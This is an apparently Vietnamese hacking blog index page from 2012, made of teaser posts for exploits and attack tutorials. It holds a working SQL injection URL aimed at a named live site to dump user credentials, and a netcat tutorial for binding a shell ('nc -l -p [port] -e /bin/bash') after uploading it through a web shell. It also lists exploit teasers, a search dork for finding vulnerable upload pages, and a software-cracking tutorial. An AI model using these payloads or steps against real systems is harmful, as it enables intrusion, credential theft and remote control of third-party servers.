WordPress WP E-Commerce 3.8.9 SQL Injection / Cross Site Scripting
Software: WP e-Commerce
Software Language: PHP
Version: 3.8.9 and below
Vendor Status: Vendor contacted
Release Date: 2012-11-12
Risk: High
Thứ Bảy, 1 tháng 12, 2012
6 Random Injections
1/
Mã:
http://www.elansystems.co.za/product-item.php?product_items_id=-11 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,group_concat(username,0x3b,password),5,6,7,8,9,10 from users_tbl--
Đọc Thêm
Chuyên Mục:
SQL Injection
[TUT] SQL dạng HTML
Link Download
http://www.mediafire.com/?6hh2ykae8xpuq2q
Hoặc
https://www.box.com/s/3m0xluf10xdhcdw95qzu
kakavn
WordPress WP E-Commerce 3.8.9 SQL Injection / Cross Site Scripting
Top Site trong nước dính SQL Check 23/11/2012
một vài site trong nước vẫn còn dính lỗi SQL khá nhiều, trong đó tiêu biểu là có cả ĐHQG Việt Nam ( Viet Nam University)
Chuyên Mục:
Hacking and Security,
SQL Injection
Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution
<?php /* ---------------------------------------------------------------- Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution ---------------------------------------------------------------- author..............: Egidio Romano aka EgiX mail................: n0b0d13s[at]gmail[dot]com software link.......:
Đọc Thêm
MyBB Profile Albums Plugin 0.9 (albums.php, album parameter) SQL Injection
Tut:
1. Tạo cái user trên forum victim.
2. Tạo cái Album rồi upload hình lên.
-> 2 bước trên để có được cái ID user và ID của album sử dụng cho bước thứ 3.
Đọc Thêm
Puzzles to Test your Hacking Skills
Hello Friends,
Many readers of my site want to be a hacker.... and till then of course you have learnt many things.... So now its time to check your hacking Skills.
Đọc Thêm
"Testing Image collection" shell and files upload vulnrablity
intitle:"Testing Image Collections"
Đọc Thêm
CK Hash Cracker
CK_HASH_CRACKER VERSION 3.0 Download Link: Click Here
__Change Log__
Hash Identifier Modified
Tutorial: How Crack IDM
https://www.box.com/shared/codrpymlceTutorial by Lovepascal (2007).
[Tutorial]Backconnect with netcat
netcat windows-http://anonym.to/?http://joncraton.o...at-for-windows
nc to upload with shell-http://www.multiupload.nl/TOBD6TAOXE
2.Upload nc with shell
3.set chmod 777 for nc
4.run command ./nc -vv -l -p [port] -e /bin/bash at shell
5.open cmd direct to where nc save like this cd c:\
and run this command nc -vv [ip target] [port]
6.now you have back connect it
[Video TUT] Remote Code Execution vbullentin 4.1.10 Exploit
Đọc Thêm
Đăng ký:
Bài đăng (Atom)